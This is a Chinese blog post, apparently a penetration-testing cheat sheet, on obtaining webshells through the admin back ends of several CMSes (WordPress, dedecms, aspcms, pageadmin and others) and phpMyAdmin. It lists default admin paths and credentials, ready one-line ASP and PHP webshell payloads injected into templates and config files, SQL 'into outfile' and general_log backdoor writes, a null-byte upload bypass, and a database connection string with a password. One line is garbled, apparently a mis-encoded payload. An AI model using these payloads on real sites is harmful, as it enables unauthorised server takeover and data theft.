常见的CMS后台getshell姿势总结

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: 常见的CMS后台getshell姿势总结

WordPress

默认后台登录地址

/wp-login.php   /wp-admin

登录后在外观的编辑里面找一个模板,我们在404模板 (404.php)里面写入一句话后门

可以蚁剑连接

上传一个压缩包主题,压缩包里面有一句话木马,网站自解压后我们可以getshell

dedecms

默认密码为admin admin

系统默认管理路径是dede

在后台的文件式管理器上传后门,目录uploads/1.php

在主页模板里加上PHP代码,然后在更新主页HTML中将首页的文件名后缀改为php

通过广告插入PHP任意代码,目录是/plus/ad_js.php?aid=8

注意这里不能将cmd通过引号括起来,因为会被转义时添加\导致getshell失败

aspcms

默认登录地址Admin_aspcms

ASP 文件通常包含 HTML 标签,就像 HTML 文件。然而,ASP 文件也能包含服务器脚本,这些脚本被分隔符 <% 和 %> 包围起来。

第一个getshell的地方是幻灯片,内容会保存在配置文件\config\AspCms_Config.asp里面

bp抓包修改slidestyle为99,在配置文件里面成功发现修改成功

闭合前面,并写入一句话木马

1%><%eval request(chr(35))%><%进行url(key编码)

1%25><%25eval+request(chr(35))%25><%25

南方数据企业系统

常量设置内加入后门

在目录\Inc\Const.asp

添加新闻处通过00截断上传文件(%00通过url解码,并且将文件填充大量无意义的字符以达到正常的文件大小防止被限制)

连接蚁剑

将网页信息中的联系邮箱改为下面的代码

smtp.163.com"%><%eval request(chr(35))%><% s="

Const JMailOutFrom = "smtp.163.com"%><%eval request(chr(35))%><% s=""

虽然报错500,但是仍然能连接上webshell

phpmyadmin日志

into outfile 把后门写到网站目录上

select '<?php phpinfo();eval($_POST[cmd]);?>' into outfile 'D:/www/a.php'

利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell

1. SET global general_log = "ON"; 日志保存状态开启;
2. SET global general_log_file ='D:/WWW/a.php'; 修改日志的保存位置。

此时目录下创建了a.php文件,我们通过查询将一句话写入日志文件,写入后门后可以getshell

select '<?php phpinfo(); ?>';

pageadmin

默认登录地址/admin/login/

上传含有webshell的压缩包,解压后得到webshell

目录管理器 查找web.config 里面有数据库的连接信息

用菜刀远程连接SQLserver192.168.10.142  _H6psv8Fmr2C7mvsF6qkGnE

1. <T>ADO</T>
2. <C>Driver={Sql Server};Server=192.168.10.142;Database=master;Uid=sa;Pwd=_H6psv8Fmr2C7mvsF6qkGnE</C>

无忧企业系统

1.修改白名单后缀,然后直接上传脚本

2.普通用户留言,后台回复

攠數畣整爠煥敵瑳∨

访问数据库的目录,webshell的密码是a

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
目录
相关文章
|
26天前
|
安全 前端开发 UED
除了wordpress CMS外,还有什么CMS值得我们使用?
作为建站的小白,前端不会开发、后台不会编写,用CMS来搭建网站是最理想的建站方式,经过线上的站长推荐,我认识了wordpress CMS,来自国外的一套CMS,使用上非常方便,熟悉时间不需要太长,也能快速进入建站的过程。
|
4月前
|
数据库
discuz后台计划任务不运行解决方法
discuz后台计划任务不运行解决方法
38 2
|
1月前
|
安全 数据可视化
PageAdmin CMS能永久使用吗?
如果你正在计划创建自己的网站,一些流行成熟的CMS包括PageAdmin CMS,可供选择。他们的CMS购买后是永久使用的。有些用户觉得为什么他们的CMS购买后能永久使用呢?
|
SQL 安全 关系型数据库
phpMyAdmin后台Getshell总结
phpMyAdmin后台Getshell总结
389 1
|
弹性计算 关系型数据库 MySQL
使用 DedeCMS 快速搭建 CMS 网站 | 学习笔记
快速学习 使用 DedeCMS 快速搭建 CMS 网站
218 0
 使用 DedeCMS 快速搭建 CMS 网站 | 学习笔记
|
域名解析 弹性计算 网络协议
使用 PHPCMS 快速搭建 CMS 网站 | 学习笔记
快速学习 使用 PHPCMS 快速搭建 CMS 网站
344 0
使用 PHPCMS 快速搭建 CMS 网站 | 学习笔记
wordpress后台提示内存不足的解决办法
本人是个小小的站长,在美国那边买了个HostEase的主机。用Wordpress建博客的时候,前段时间还好好的,但今天不知道是这么回事,网站首页可以打开,但进后台的时候遇到这样类似的错误提示: Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate xxx bytes) 意思就是word
1892 0
|
XML 缓存 供应链
使用 Dede CMS 快速搭建 CMS 网站|学习笔记
快速学习 使用 Dede CMS 快速搭建 CMS 网站
198 0
|
安全 数据安全/隐私保护 UED
PageAdmin CMS预防用户密码被暴力破解的解决办法
最近这几年,网站安全越来越严格,之前用dedecms做的学校网站被网监通报并要求过二级等保才能上线,国内能过二级的cms很少,下载了好几个cms对比,最终确定用pageadmin cms改版,但是在做二级等保时候检测机构提示网站有暴力破解漏洞被驳回,后来看了论坛帮助后解决了这个问题,并且成功通过了公安部二级等保。
551 0
PageAdmin CMS预防用户密码被暴力破解的解决办法
|
前端开发
PageAdmin Cms建站系统如何修改后台登录目录
pageadmin修改后台登录目录的解决办法
641 0
PageAdmin Cms建站系统如何修改后台登录目录